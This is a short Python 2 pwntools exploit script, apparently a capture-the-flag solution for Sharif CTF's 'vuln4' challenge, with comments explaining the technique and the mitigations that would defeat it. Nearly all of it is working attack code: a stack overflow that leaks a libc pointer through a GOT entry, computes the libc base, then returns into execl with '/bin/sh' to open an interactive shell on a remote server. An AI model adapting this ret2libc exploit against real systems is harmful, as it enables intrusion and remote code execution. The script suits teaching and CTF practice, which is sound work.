#!/usr/bin/python
# Python 2 exploit script for a CTF challenge (Sharif CTF, "vuln4"): a stack
# overflow is used once to leak a libc pointer from the binary, then a second
# time to return into libc with the leaked base.
#
# Defender's reading of why this works: the binary-side addresses below are
# hard-coded in the 0x0804xxxx range (so the target is presumably a non-PIE
# 32-bit ELF), 22 bytes of filler apparently reach the saved return address
# (no canary in the way), and the libc offsets match one specific libc build.
# PIE, stack protector and a bounds-checked read each defeat a different step.
import pwn
import struct

# Binary-side addresses, packed as 32-bit little-endian ("<L").
OFFSET_HEADSHOT = struct.pack("<L",0x080483A0)   # first return target; presumably a PLT stub that prints -- confirm against the binary
OFFSET_RETN = struct.pack("<L",0x080484EA)       # address the stub returns to afterwards -- semantics not visible here
OFFSET_PLT = struct.pack("<L",0x08049874)        # argument slot; presumably the GOT entry whose contents come back as OFFSET_PUTS
OFFSET_ROPBREAK = struct.pack("<L",0x41424344)   # "DCBA" marker; not used anywhere in this script

p = pwn.remote("ctf.sharif.edu",4801)            # live challenge server
# p = pwn.process("./vuln4")                      # local alternative, kept commented out
# x = raw_input("Press enter to continue")       # pause so a debugger can be attached

p.recv()                                         # discard the banner/prompt

# Stage 1: filler plus the three packed addresses; the reply is expected to
# start with a 4-byte pointer that is taken as puts's address in libc.
p.send("A"*22 + OFFSET_HEADSHOT + OFFSET_RETN + OFFSET_PLT + "\n")
data = p.recv()
OFFSET_PUTS = struct.unpack("<L",data[0:4])[0]   # raises struct.error if fewer than 4 bytes came back
OFFSET_LIBC = OFFSET_PUTS - 0x5FCA0              # puts offset within the remote libc; tied to that exact build
OFFSET_EXECL = struct.pack("<L",OFFSET_LIBC + 0x3ada0)   # execl in the same libc build
OFFSET_BINSH = struct.pack("<L",OFFSET_LIBC + 0x15ba0b)  # "/bin/sh" string in the same libc build
print "puts at : %x" % OFFSET_PUTS
# print "libc at : %x" % OFFSET_LIBC

# Stage 2: the same overflow, this time returning into execl; the string address
# fills the two slots that follow (return address and first argument, presumably).
p.send("A"*22 + OFFSET_EXECL + OFFSET_BINSH + OFFSET_BINSH + "\n")
p.interactive()                                  # hand the connection over to the user